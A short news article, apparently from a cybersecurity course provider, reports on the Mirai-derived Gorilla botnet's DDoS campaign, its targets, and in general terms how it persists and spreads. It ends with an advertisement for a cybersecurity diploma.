Cybersecurity experts have discovered a new botnet called Gorilla (also known as GorillaBot), which is built from the leaked Mirai botnet source code. This botnet is creating significant disruptions around the world.
According to cybersecurity firm NSFOCUS, the Gorilla botnet launched over 300,000 attack commands between September 4 and September 27, 2024. On average, 20,000 commands per day were used to perform distributed denial-of-service (DDoS) attacks, with a high intensity of attacks aimed at over 100 countries. The main targets include universities, government websites, telecom companies, banks, gaming platforms, and gambling sectors. China, the U.S., Canada, and Germany have been the most affected.
The Gorilla botnet uses various techniques to launch DDoS attacks, such as UDP flood, SYN flood, and ACK flood methods. These attacks generate large volumes of fake traffic, making it hard for victims to manage. The UDP protocol’s ability to spoof source IP addresses makes this type of attack especially dangerous.
What makes Gorilla even more concerning is its capability to run on various systems, including ARM, MIPS, and x86 processors. It also connects to one of five command-and-control (C2) servers to receive attack commands.
In addition, Gorilla exploits a known security flaw in Apache Hadoop YARN RPC, which allows hackers to remotely control affected systems. Although this vulnerability has been abused since 2021, Gorilla continues to take advantage of it.
Once the malware infects a device, it creates a service file that ensures it automatically runs whenever the system starts. It downloads and runs a malicious script from a remote server to maintain control over the device. Gorilla also uses encryption techniques to avoid detection, making it more challenging for cybersecurity experts to combat.
The rise of the Gorilla botnet is a reminder of the ever-growing threats in the digital world. Businesses, governments, and individuals need to remain vigilant against these emerging attacks.
Want to learn how to defend against such sophisticated cyber threats? Enroll in our comprehensive One-Year Cybersecurity Diploma, where we cover real-world security risks and solutions!
